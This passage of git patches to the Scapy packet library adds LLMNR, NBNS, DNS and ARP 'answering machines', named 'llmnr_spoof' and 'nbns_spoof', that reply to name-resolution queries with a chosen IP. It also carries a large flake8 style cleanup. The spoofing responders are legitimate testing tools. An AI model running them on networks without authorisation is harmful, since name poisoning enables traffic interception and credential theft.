get_if_addr(self.optsniff.get("iface", conf.iface)) + ) + if isinstance(rdata, (tuple, list)): + # Fallback + rdata = rdata[0] + resp /= self.cls(id=dns.id, qr=1, qd=dns.qd, + an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata)) return resp diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 31717529f91..ed96e978c1f 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -853,9 +853,16 @@ class ARP_am(AnsweringMachine[Packet]): filter = "arp" send_function = staticmethod(sendp) - def parse_options(self, IP_addr=None, ARP_addr=None): - # type: (Optional[str], Optional[str]) -> None - self.IP_addr = IP_addr + def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None): + # type: (Optional[str], Optional[str], Optional[str]) -> None + if isinstance(IP_addr, str): + self.IP_addr = Net(IP_addr) # type: Optional[Net] + else: + self.IP_addr = IP_addr + if isinstance(from_ip, str): + self.from_ip = Net(from_ip) # type: Optional[Net] + else: + self.from_ip = from_ip self.ARP_addr = ARP_addr def is_request(self, req): @@ -863,8 +870,11 @@ def is_request(self, req): if not req.haslayer(ARP): return False arp = req[ARP] - return arp.op == 1 and \ - (self.IP_addr is None or self.IP_addr == arp.pdst) # noqa: E501 + return ( + arp.op == 1 and + (self.IP_addr is None or arp.pdst in self.IP_addr) and + (self.from_ip is None or arp.psrc in self.from_ip) + ) def make_reply(self, req): # type: (Packet) -> Packet diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index 4f32b114299..01e211939ca 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -18,7 +18,12 @@ from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.compat import orb from scapy.layers.inet import UDP -from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField +from scapy.layers.dns import ( + DNSQRField, + DNSRRField, + DNSRRCountField, + DNS_am, +) _LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3" @@ -47,6 +52,17 @@ class LLMNRQuery(Packet): def hashret(self): return struct.pack("!H", self.id) + def mysummary(self): + if self.an: + return "LLMNRResponse '%s' is at '%s'" % ( + self.an.rrname.decode(), + self.an.rdata, + ), [UDP] + if self.qd: + return "LLMNRQuery who has '%s'" % ( + self.qd.qname.decode(), + ), [UDP] + class LLMNRResponse(LLMNRQuery): name = "Link Local Multicast Node Resolution - Response" @@ -74,4 +90,11 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): bind_bottom_up(UDP, _LLMNR, sport=5355) bind_layers(UDP, _LLMNR, sport=5355, dport=5355) + +class LLMNR_am(DNS_am): + function_name = "llmnr_spoof" + filter = "udp port 5355" + cls = LLMNRQuery + + # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista."))) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 1d0ef16246d..7b3f50a3a7e 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -11,6 +11,7 @@ import struct from scapy.arch import get_if_addr +from scapy.base_classes import Net from scapy.ansmachine import AnsweringMachine, AnsweringMachineUtils from scapy.config import conf @@ -29,9 +30,10 @@ ShortEnumField, ShortField, StrFixedLenField, - XShortField + XShortField, + XStrFixedLenField ) -from scapy.layers.inet import UDP, TCP +from scapy.layers.inet import IP, UDP, TCP from scapy.layers.l2 import SourceMACField @@ -128,7 +130,6 @@ class NBNSHeader(Packet): ] # Name Query Request -# Node Status Request class NBNSQueryRequest(Packet): @@ -148,36 +149,6 @@ def mysummary(self): bind_layers(NBNSHeader, NBNSQueryRequest, OPCODE=0x0, NM_FLAGS=0x11, QDCOUNT=1) -# Name Registration Request - - -class NBNSRegistrationRequest(Packet): - name = "NBNS registration request" - fields_desc = [ShortField("NAME_TRN_ID", 0), - ShortField("FLAGS", 0x2910), - ShortField("QDCOUNT", 1), - ShortField("ANCOUNT", 0), - ShortField("NSCOUNT", 0), - ShortField("ARCOUNT", 1), - NetBIOSNameField("QUESTION_NAME", "Windows"), - ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), - ByteField("NULL", 0), - ShortEnumField("QUESTION_TYPE", 0x20, _NETBIOS_QRTYPES), - ShortEnumField("QUESTION_CLASS", 1, _NETBIOS_QRCLASS), - ShortEnumField("RR_NAME", 0xC00C, _NETBIOS_RNAMES), - ShortEnumField("RR_TYPE", 0x20, _NETBIOS_QRTYPES), - ShortEnumField("RR_CLASS", 1, _NETBIOS_QRCLASS), - IntField("TTL", 0), - ShortField("RDLENGTH", 6), - BitEnumField("G", 0, 1, _NETBIOS_GNAMES), - BitEnumField("OWNER_NODE_TYPE", 00, 2, - _NETBIOS_OWNER_MODE_TYPES), - BitEnumField("UNUSED", 0, 13, {0: "Unused"}), - IPField("NB_ADDRESS", "127.0.0.1")] - - -bind_layers(NBNSHeader, NBNSRegistrationRequest, - OPCODE=0x5, NM_FLAGS=0x11, QDCOUNT=1, ARCOUNT=1) # Name Query Response @@ -218,12 +189,29 @@ def mysummary(self): bind_layers(NBNSHeader, NBNSQueryResponse, OPCODE=0x0, NM_FLAGS=0x50, RESPONSE=1, ANCOUNT=1) +# Node Status Request + + +class NBNSNodeStatusRequest(NBNSQueryRequest): + name = "NBNS status request" + QUESTION_NAME = b"*" + b"\x00" * 14 + QUESTION_TYPE = 0x21 + + def mysummary(self): + return "NBNSNodeStatusRequest who has '\\\\%s'" % ( + self.QUESTION_NAME.strip().decode() + ) + + +bind_bottom_up(NBNSHeader, NBNSNodeStatusRequest, OPCODE=0x0, NM_FLAGS=0, QDCOUNT=1) +bind_layers(NBNSHeader, NBNSNodeStatusRequest, OPCODE=0x0, NM_FLAGS=1, QDCOUNT=1) # Node Status Response + class NBNSNodeStatusResponseService(Packet): name = "NBNS Node Status Response Service" - fields_desc = [StrFixedLenField("NETBIOS_NAME", "WINDOWS ", 16), + fields_desc = [StrFixedLenField("NETBIOS_NAME", "WINDOWS ", 15), ByteEnumField("SUFFIX", 0, {0: "workstation", 0x03: "messenger service", 0x20: "file server service", @@ -254,12 +242,45 @@ class NBNSNodeStatusResponse(Packet): NBNSNodeStatusResponseService, count_from=lambda pkt: pkt.NUM_NAMES), SourceMACField("MAC_ADDRESS"), - BitField("STATISTICS", 0, 57 * 8)] + XStrFixedLenField("STATISTICS", b"", 46)] + + def answers(self, other): + return ( + isinstance(other, NBNSNodeStatusRequest) and + other.QUESTION_NAME == self.RR_NAME + ) bind_layers(NBNSHeader, NBNSNodeStatusResponse, OPCODE=0x0, NM_FLAGS=0x40, RESPONSE=1, ANCOUNT=1) +# Name Registration Request + + +class NBNSRegistrationRequest(Packet): + name = "NBNS registration request" + fields_desc = [ + NetBIOSNameField("QUESTION_NAME", "Windows"), + ShortEnumField("SUFFIX", 0x4141, _NETBIOS_SUFFIXES), + ByteField("NULL", 0), + ShortEnumField("QUESTION_TYPE", 0x20, _NETBIOS_QRTYPES), + ShortEnumField("QUESTION_CLASS", 1, _NETBIOS_QRCLASS), + ShortEnumField("RR_NAME", 0xC00C, _NETBIOS_RNAMES), + ShortEnumField("RR_TYPE", 0x20, _NETBIOS_QRTYPES), + ShortEnumField("RR_CLASS", 1, _NETBIOS_QRCLASS), + IntField("TTL", 0), + ShortField("RDLENGTH", 6), + BitEnumField("G", 0, 1, _NETBIOS_GNAMES), + BitEnumField("OWNER_NODE_TYPE", 00, 2, + _NETBIOS_OWNER_MODE_TYPES), + BitEnumField("UNUSED", 0, 13, {0: "Unused"}), + IPField("NB_ADDRESS", "127.0.0.1") + ] + + +bind_layers(NBNSHeader, NBNSRegistrationRequest, + OPCODE=0x5, NM_FLAGS=0x11, QDCOUNT=1, ARCOUNT=1) + # Wait for Acknowledgement Response @@ -333,15 +354,28 @@ def post_build(self, pkt, pay): class NBNS_am(AnsweringMachine): - function_name = "netbios_announce" + function_name = "nbns_spoof" filter = "udp port 137" - sniff_options = {"store": 0, "L2socket": conf.L3socket} + sniff_options = {"store": 0} + + def parse_options(self, server_name=None, from_ip=None, ip=None): + """ + NBNS answering machine - def parse_options(self, server_name=None, ip=None): + :param server_name: the netbios server name to match + :param from_ip: an IP (can have a netmask) to filter on + :param ip: the IP to answer with + """ self.ServerName = server_name self.ip = ip + if isinstance(from_ip, str): + self.from_ip = Net(from_ip) + else: + self.from_ip = from_ip def is_request(self, req): + if self.from_ip and IP in req and req[IP].src not in self.from_ip: + return False return NBNSQueryRequest in req and ( not self.ServerName or req[NBNSQueryRequest].QUESTION_NAME.decode().strip() == @@ -351,7 +385,6 @@ def is_request(self, req): def make_reply(self, req): # type: (Packet) -> Packet resp = AnsweringMachineUtils.reverse_packet(req) - resp[UDP].remove_payload() address = self.ip or get_if_addr( self.optsniff.get("iface", conf.iface)) resp /= NBNSHeader() / NBNSQueryResponse( diff --git a/test/answering_machines.uts b/test/answering_machines.uts index e81654daa96..bcdab421a5d 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -58,7 +58,8 @@ def check_DNS_am_reply(packet): test_am(DNS_am, IP()/UDP()/DNS(qd=DNSQR(qname="www.secdev.org")), - check_DNS_am_reply) + check_DNS_am_reply, + joker="192.168.1.1") = DHCPv6_am - Basic Instantiaion ~ osx netaccess diff --git a/test/scapy/layers/netbios.uts b/test/scapy/layers/netbios.uts index dc8118ff8a6..9f4ff76c036 100644 --- a/test/scapy/layers/netbios.uts +++ b/test/scapy/layers/netbios.uts @@ -30,11 +30,20 @@ assert pkt.ADDR_ENTRY[0].NB_ADDRESS == "192.168.0.13" = NBNSNodeStatusResponse - build & dissect z = NBNSHeader()/NBNSNodeStatusResponse(NODE_NAME=[NBNSNodeStatusResponseService(NETBIOS_NAME="WINDOWS")], MAC_ADDRESS="aa:aa:aa:aa:aa:aa") -assert raw(z) == b'\x00\x00\x84\x00\x00\x00\x00\x01\x00\x00\x00\x00 HHGJGOGEGPHHHDCACACACACACACACAAA\x00\x00!\x00\x01\x00\x00\x00\x00\x00S\x01WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert raw(z) == b'\x00\x00\x84\x00\x00\x00\x00\x01\x00\x00\x00\x00 HHGJGOGEGPHHHDCACACACACACACACAAA\x00\x00!\x00\x01\x00\x00\x00\x00\x00S\x01WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' pkt = NBNSHeader(raw(z)) -assert pkt.NODE_NAME[0].NETBIOS_NAME == b'WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert pkt.NODE_NAME[0].NETBIOS_NAME == b'WINDOWS\x00\x00\x00\x00\x00\x00\x00\x00' assert NBNSNodeStatusResponse in pkt += NBNSNodeStatusRequest - build and answers + +pkt = UDP()/NBNSHeader()/NBNSNodeStatusRequest() +assert raw(pkt.payload) == b'\x00\x00\x00\x10\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01' + +resp = UDP(b'\x00\x89\x00\x89\x00\xc9v>\x00\x00\x84\x00\x00\x00\x00\x01\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01\x00\x00\x00\x00\x00\x89\x05DOMAIN \x00\x84\x00SRV1 \x00\x04\x00DOMAIN \x1c\x84\x00SRV1 \x04\x00DOMAIN \x1b\x04\x00RT\x00iX\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert [x.NETBIOS_NAME.strip() for x in resp.NODE_NAME] == [b'DOMAIN', b'SRV1', b'DOMAIN', b'SRV1', b'DOMAIN'] +assert resp.answers(pkt) + = NBNSWackResponse - build & dissect z = NBNSHeader()/NBNSWackResponse(RR_NAME="SARAH") @@ -46,4 +55,4 @@ assert pkt[NBNSWackResponse].RR_NAME == b'SARAH ' z = raw(TCP()/NBTSession()) assert z == b'\x00\x8b\x00\x8b\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00\x00\x00\x00\x00' -assert NBTSession in TCP(z) \ No newline at end of file +assert NBTSession in TCP(z) From 08b1f9d67c8e716fd44036a027bdc90dcb9fcfdf Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 10 Aug 2022 13:36:33 +0200 Subject: [PATCH 0860/1632] E275 - Missing whitespace after keyword (#3711) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Alexander Aring Co-authored-by: Anmol Sarma Co-authored-by: antoine.torre Co-authored-by: Antoine Vacher Co-authored-by: Arnaud Ebalard Co-authored-by: atlowl <86038305+atlowl@users.noreply.github.com> Co-authored-by: Brian Bienvenu Co-authored-by: Chris Packham Co-authored-by: CQ Co-authored-by: Daniel Collins Co-authored-by: Federico Maggi Co-authored-by: Florian Maury Co-authored-by: _Frky <3105926+Frky@users.noreply.github.com> Co-authored-by: g-mahieux <37588339+g-mahieux@users.noreply.github.com> Co-authored-by: gpotter2 Co-authored-by: Guillaume Valadon Co-authored-by: Hao Zheng Co-authored-by: Haresh Khandelwal Co-authored-by: Harri Hämäläinen Co-authored-by: hecke Co-authored-by: Jan Romann Co-authored-by: Jan Sebechlebsky Co-authored-by: jdiog0 <43411724+jdiog0@users.noreply.github.com> Co-authored-by: jockque <38525640+jockque@users.noreply.github.com> Co-authored-by: Julien Bedel <30991560+JulienBedel@users.noreply.github.com> Co-authored-by: Keith Scott Co-authored-by: Kfir Gollan Co-authored-by: Lars Munch Co-authored-by: ldp77 <52221370+ldp77@users.noreply.github.com> Co-authored-by: Leonard Crestez Co-authored-by: Marcel Patzlaff Co-authored-by: Martijn Thé Co-authored-by: Martine Lenders Co-authored-by: Michael Farrell Co-authored-by: Michał Mirosław Co-authored-by: mkaliszan Co-authored-by: mtury Co-authored-by: Neale Ranns Co-authored-by: Octavian Toader Co-authored-by: Peter Eisenlohr Co-authored-by: Phil Co-authored-by: Pierre Lalet Co-authored-by: Pierre Lorinquer Co-authored-by: piersoh <42040737+piersoh@users.noreply.github.com> Co-authored-by: plorinquer Co-authored-by: pvinci Co-authored-by: Rahul Jadhav Co-authored-by: Robin Jarry Co-authored-by: romain-perez <51962832+romain-perez@users.noreply.github.com> Co-authored-by: rperez Co-authored-by: Sabrina Dubroca Co-authored-by: Sebastian Baar Co-authored-by: sebastien mainand Co-authored-by: smehner1 Co-authored-by: speakinghedge Co-authored-by: Steven Van Acker Co-authored-by: Thomas Faivre Co-authored-by: Tran Tien Dat Co-authored-by: Wael Mahlous Co-authored-by: waeva <74464394+waeva@users.noreply.github.com> Co-authored-by: Alexander Aring Co-authored-by: Anmol Sarma Co-authored-by: antoine.torre Co-authored-by: Antoine Vacher Co-authored-by: Arnaud Ebalard Co-authored-by: atlowl <86038305+atlowl@users.noreply.github.com> Co-authored-by: Brian Bienvenu Co-authored-by: Chris Packham Co-authored-by: CQ Co-authored-by: Daniel Collins Co-authored-by: Federico Maggi Co-authored-by: Florian Maury Co-authored-by: _Frky <3105926+Frky@users.noreply.github.com> Co-authored-by: g-mahieux <37588339+g-mahieux@users.noreply.github.com> Co-authored-by: gpotter2 Co-authored-by: Guillaume Valadon Co-authored-by: Hao Zheng Co-authored-by: Haresh Khandelwal Co-authored-by: Harri Hämäläinen Co-authored-by: hecke Co-authored-by: Jan Romann Co-authored-by: Jan Sebechlebsky Co-authored-by: jdiog0 <43411724+jdiog0@users.noreply.github.com> Co-authored-by: jockque <38525640+jockque@users.noreply.github.com> Co-authored-by: Julien Bedel <30991560+JulienBedel@users.noreply.github.com> Co-authored-by: Keith Scott Co-authored-by: Kfir Gollan Co-authored-by: Lars Munch Co-authored-by: ldp77 <52221370+ldp77@users.noreply.github.com> Co-authored-by: Leonard Crestez Co-authored-by: Marcel Patzlaff Co-authored-by: Martijn Thé Co-authored-by: Martine Lenders Co-authored-by: Michael Farrell Co-authored-by: Michał Mirosław Co-authored-by: mkaliszan Co-authored-by: mtury Co-authored-by: Neale Ranns Co-authored-by: Octavian Toader Co-authored-by: Peter Eisenlohr Co-authored-by: Phil Co-authored-by: Pierre Lalet Co-authored-by: Pierre Lorinquer Co-authored-by: piersoh <42040737+piersoh@users.noreply.github.com> Co-authored-by: pvinci Co-authored-by: Rahul Jadhav Co-authored-by: Robin Jarry Co-authored-by: romain-perez <51962832+romain-perez@users.noreply.github.com> Co-authored-by: rperez Co-authored-by: Sabrina Dubroca Co-authored-by: Sebastian Baar Co-authored-by: sebastien mainand Co-authored-by: smehner1 Co-authored-by: Steven Van Acker Co-authored-by: Thomas Faivre Co-authored-by: Tran Tien Dat Co-authored-by: Wael Mahlous Co-authored-by: waeva <74464394+waeva@users.noreply.github.com> --- scapy/arch/windows/structures.py | 6 +- scapy/asn1/ber.py | 2 +- scapy/asn1/mib.py | 4 +- scapy/asn1fields.py | 2 +- scapy/base_classes.py | 2 +- scapy/contrib/diameter.py | 2 +- scapy/contrib/http2.py | 110 +- scapy/contrib/igmpv3.py | 2 +- scapy/contrib/ikev2.py | 8 +- scapy/contrib/openflow3.py | 2 +- scapy/contrib/pnio.py | 6 +- scapy/contrib/sdnv.py | 4 +- scapy/fields.py | 4 +- scapy/layers/dhcp.py | 8 +- scapy/layers/dhcp6.py | 2 +- scapy/layers/dns.py | 2 +- scapy/layers/dot11.py | 2 +- scapy/layers/http.py | 4 +- scapy/layers/inet.py | 22 +- scapy/layers/inet6.py | 12 +- scapy/layers/isakmp.py | 8 +- scapy/layers/ntlm.py | 2 +- scapy/layers/x509.py | 2 +- scapy/main.py | 10 +- scapy/packet.py | 6 +- scapy/plist.py | 4 +- scapy/route.py | 2 +- scapy/route6.py | 2 +- scapy/supersocket.py | 4 +- test/answering_machines.uts | 20 +- test/cert.uts | 52 +- test/contrib/aoe.uts | 12 +- test/contrib/automotive/someip.uts | 584 +++---- test/contrib/bgp.uts | 138 +- test/contrib/bier.uts | 4 +- test/contrib/cdp.uts | 96 +- test/contrib/coap.uts | 46 +- test/contrib/eddystone.uts | 2 +- test/contrib/enipTCP.uts | 174 +- test/contrib/esmc.uts | 12 +- test/contrib/ethercat.uts | 50 +- test/contrib/geneve.uts | 18 +- test/contrib/http2.uts | 2096 ++++++++++++------------ test/contrib/iec104.uts | 182 +- test/contrib/ife.uts | 18 +- test/contrib/isis.uts | 50 +- test/contrib/isotp_message_builder.uts | 148 +- test/contrib/isotp_native_socket.uts | 148 +- test/contrib/isotp_packet.uts | 380 ++--- test/contrib/isotp_soft_socket.uts | 174 +- test/contrib/knx.uts | 32 +- test/contrib/lacp.uts | 10 +- test/contrib/lldp.uts | 30 +- test/contrib/mac_control.uts | 54 +- test/contrib/macsec.uts | 234 +-- test/contrib/modbus.uts | 182 +- test/contrib/mount.uts | 12 +- test/contrib/mpls.uts | 8 +- test/contrib/mqtt.uts | 142 +- test/contrib/mqttsn.uts | 14 +- test/contrib/nfs.uts | 84 +- test/contrib/oncrpc.uts | 4 +- test/contrib/opc_da.uts | 10 +- test/contrib/openflow.uts | 14 +- test/contrib/openflow3.uts | 16 +- test/contrib/pcom.uts | 18 +- test/contrib/pnio.uts | 166 +- test/contrib/pnio_dcp.uts | 342 ++-- test/contrib/pnio_rpc.uts | 46 +- test/contrib/rpl.uts | 88 +- test/contrib/rtps.uts | 4 +- test/contrib/tzsp.uts | 230 +-- test/fields.uts | 666 ++++---- test/linux.uts | 28 +- test/random.uts | 58 +- test/regression.uts | 312 ++-- test/scapy/automaton.uts | 56 +- test/scapy/layers/asn1.uts | 12 +- test/scapy/layers/bluetooth.uts | 58 +- test/scapy/layers/dhcp6.uts | 18 +- test/scapy/layers/dns.uts | 14 +- test/scapy/layers/dns_dnssec.uts | 6 +- test/scapy/layers/dot11.uts | 4 +- test/scapy/layers/eap.uts | 418 ++--- test/scapy/layers/inet.uts | 70 +- test/scapy/layers/inet6.uts | 58 +- test/scapy/layers/ipsec.uts | 1882 ++++++++++----------- test/scapy/layers/ntp.uts | 1418 ++++++++-------- test/scapy/layers/ppp.uts | 72 +- test/scapy/layers/pptp.uts | 8 +- test/scapy/layers/radius.uts | 266 +-- test/scapy/layers/sctp.uts | 256 +-- test/scapy/layers/snmp.uts | 18 +- test/scapy/layers/tftp.uts | 4 +- test/scapy/layers/vxlan.uts | 42 +- test/scapy/layers/x509.uts | 100 +- test/sslv2.uts | 160 +- test/tls.uts | 212 +-- test/tls13.uts | 684 ++++---- 99 files changed, 6642 insertions(+), 6648 deletions(-) diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index a61827cd28c..88ba5cfe6b6 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -224,7 +224,7 @@ def GetIcmpStatistics(): statistics = MIB_ICMP() _GetIcmpStatistics(byref(statistics)) results = _struct_to_dict(statistics) - del(statistics) + del statistics return results ############################## @@ -452,7 +452,7 @@ def GetAdaptersAddresses(AF=AF_UNSPEC): if res != NO_ERROR: raise RuntimeError("Error retrieving table (%d)" % res) results = _resolve_list(AdapterAddresses) - del(AdapterAddresses) + del AdapterAddresses return results ############################## @@ -511,7 +511,7 @@ def GetIpForwardTable(): results = [] for i in range(pIpForwardTable.contents.NumEntries): results.append(_struct_to_dict(pIpForwardTable.contents.Table[i])) - del(pIpForwardTable) + del pIpForwardTable return results ### V2 ### diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 5e18ff2bb24..5e2a8148ad1 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -545,7 +545,7 @@ def enc(cls, _oid): lst = list() if len(lst) >= 2: lst[1] += 40 * lst[0] - del(lst[0]) + del lst[0] s = b"".join(BER_num_enc(k) for k in lst) return chb(hash(cls.tag)) + BER_len_enc(len(s)) + s diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index c0f071e5d38..7a61411b9e1 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -146,8 +146,8 @@ def _mib_register(ident, # type: str k = keys[i] if _mib_register(k, unresolved[k], the_mib, {}, alias): # Now resolved: we can remove it from unresolved - del(unresolved[k]) - del(keys[i]) + del unresolved[k] + del keys[i] i = 0 else: i += 1 diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 816f0f823be..2efcaf551f9 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -188,7 +188,7 @@ def extract_packet(self, if cpad is not None: s = cpad.load if cpad.underlayer: - del(cpad.underlayer.payload) + del cpad.underlayer.payload return c, s def build(self, pkt): diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 63e5c80fa35..487011f707a 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -321,7 +321,7 @@ def __new__(cls, if f.name in dct: f = f.copy() f.default = dct[f.name] - del(dct[f.name]) + del dct[f.name] final_fld.append(f) dct["fields_desc"] = final_fld diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index e67c44e7276..a53eee3c810 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -4788,7 +4788,7 @@ def getCmdParams(cmd, request, **fields): found = True break if not found: - del(fields['drAppId']) + del fields['drAppId'] warning( 'Application ID with name %s not found in AppIDsEnum dictionary.' % # noqa: E501 val) diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index aecdcc9e303..6f4c0a6c7cd 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -63,9 +63,9 @@ def __init__(self, name, default, size): :return: None :raises: AssertionError """ - assert(default >= 0) + assert default >= 0 # size can be negative if encoding is little-endian (see rev property of bitfields) # noqa: E501 - assert(size != 0) + assert size != 0 self._magic = default super(HPackMagicBitField, self).__init__(name, default, size) @@ -188,8 +188,8 @@ def __init__(self, name, default, size): :return: None :raises: AssertionError """ - assert(default is None or (isinstance(default, six.integer_types) and default >= 0)) # noqa: E501 - assert(0 < size <= 8) + assert default is None or (isinstance(default, six.integer_types) and default >= 0) # noqa: E501 + assert 0 < size <= 8 super(AbstractUVarIntField, self).__init__(name, default) self.size = size self._max_value = (1 << self.size) - 1 @@ -206,7 +206,7 @@ def h2i(self, pkt, x): :return: int|None: the converted value. :raises: AssertionError """ - assert(not isinstance(x, six.integer_types) or x >= 0) + assert not isinstance(x, six.integer_types) or x >= 0 return x def i2h(self, pkt, x): @@ -229,7 +229,7 @@ def _detect_multi_byte(self, fb): :return: bool: True if multibyte repr detected, else False. :raises: AssertionError """ - assert(isinstance(fb, int) or len(fb) == 1) + assert isinstance(fb, int) or len(fb) == 1 return (orb(fb) & self._max_value) == self._max_value def _parse_multi_byte(self, s): @@ -243,7 +243,7 @@ def _parse_multi_byte(self, s): :raises:: Scapy_Exception if the input value encodes an integer larger than 1<<64 # noqa: E501 """ - assert(len(s) >= 2) + assert len(s) >= 2 tmp_len = len(s) @@ -265,7 +265,7 @@ def _parse_multi_byte(self, s): value += byte << (7 * (i - 1)) value += self._max_value - assert(value >= 0) + assert value >= 0 return value def m2i(self, pkt, x): @@ -279,7 +279,7 @@ def m2i(self, pkt, x): :param str|(str, int) x: the string to convert. If bits were consumed by a previous bitfield-compatible field. # noqa: E501 :raises: AssertionError """ - assert(isinstance(x, bytes) or (isinstance(x, tuple) and x[1] >= 0)) + assert isinstance(x, bytes) or (isinstance(x, tuple) and x[1] >= 0) if isinstance(x, tuple): assert (8 - x[1]) == self.size, 'EINVAL: x: not enough bits remaining in current byte to read the prefix' # noqa: E501 @@ -293,7 +293,7 @@ def m2i(self, pkt, x): else: ret = orb(val[0]) & self._max_value - assert(ret >= 0) + assert ret >= 0 return ret def i2m(self, pkt, x): @@ -304,7 +304,7 @@ def i2m(self, pkt, x): :return: str: the converted value. :raises: AssertionError """ - assert(x >= 0) + assert x >= 0 if x < self._max_value: return chb(x) @@ -333,9 +333,9 @@ def any2i(self, pkt, x): if isinstance(x, type(None)): return x if isinstance(x, six.integer_types): - assert(x >= 0) + assert x >= 0 ret = self.h2i(pkt, x) - assert(isinstance(ret, six.integer_types) and ret >= 0) + assert isinstance(ret, six.integer_types) and ret >= 0 return ret elif isinstance(x, bytes): ret = self.m2i(pkt, x) @@ -373,14 +373,14 @@ def addfield(self, pkt, s, val): field. :raises: AssertionError """ - assert(val >= 0) + assert val >= 0 if isinstance(s, bytes): assert self.size == 8, 'EINVAL: s: tuple expected when prefix_len is not a full byte' # noqa: E501 return s + self.i2m(pkt, val) # s is a tuple - # assert(s[1] >= 0) - # assert(s[2] >= 0) + # assert s[1] >= 0 + # assert s[2] >= 0 # assert (8 - s[1]) == self.size, 'EINVAL: s: not enough bits remaining in current byte to read the prefix' # noqa: E501 if val >= self._max_value: @@ -401,7 +401,7 @@ def _detect_bytelen_from_str(s): :return: The bytelength of the AbstractUVarIntField. :raises: AssertionError """ - assert(len(s) >= 2) + assert len(s) >= 2 tmp_len = len(s) i = 1 @@ -410,7 +410,7 @@ def _detect_bytelen_from_str(s): assert i < tmp_len, 'EINVAL: s: out-of-bound read: unfinished AbstractUVarIntField detected' # noqa: E501 ret = i + 1 - assert(ret >= 0) + assert ret >= 0 return ret def i2len(self, pkt, x): @@ -420,7 +420,7 @@ def i2len(self, pkt, x): :param int x: the positive or null value whose binary size if requested. # noqa: E501 :raises: AssertionError """ - assert(x >= 0) + assert x >= 0 if x < self._max_value: return 1 @@ -434,7 +434,7 @@ def i2len(self, pkt, x): i += 1 ret = i - assert(ret >= 0) + assert ret >= 0 return ret def getfield(self, pkt, s): @@ -451,10 +451,10 @@ def getfield(self, pkt, s): :raises: AssertionError """ if isinstance(s, tuple): - assert(len(s) == 2) + assert len(s) == 2 temp = s # type: Tuple[str, int] ts, ti = temp - assert(ti >= 0) + assert ti >= 0 assert 8 - ti == self.size, 'EINVAL: s: not enough bits remaining in current byte to read the prefix' # noqa: E501 val = ts else: @@ -467,7 +467,7 @@ def getfield(self, pkt, s): tmp_len = 1 ret = val[tmp_len:], self.m2i(pkt, s) - assert(ret[1] >= 0) + assert ret[1] >= 0 return ret def randval(self): @@ -486,8 +486,8 @@ def __init__(self, name, default, size): :param default: the default value for this field instance. default must be positive or null. # noqa: E501 :raises: AssertionError """ - assert(default >= 0) - assert(0 < size <= 8) + assert default >= 0 + assert 0 < size <= 8 super(UVarIntField, self).__init__(name, default, size) self.size = size @@ -507,7 +507,7 @@ def h2i(self, pkt, x): :raises: AssertionError """ ret = super(UVarIntField, self).h2i(pkt, x) - assert(not isinstance(ret, type(None)) and ret >= 0) + assert not isinstance(ret, type(None)) and ret >= 0 return ret def i2h(self, pkt, x): @@ -520,7 +520,7 @@ def i2h(self, pkt, x): :raises: AssertionError """ ret = super(UVarIntField, self).i2h(pkt, x) - assert(not isinstance(ret, type(None)) and ret >= 0) + assert not isinstance(ret, type(None)) and ret >= 0 return ret def any2i(self, pkt, x): @@ -533,7 +533,7 @@ def any2i(self, pkt, x): :raises: 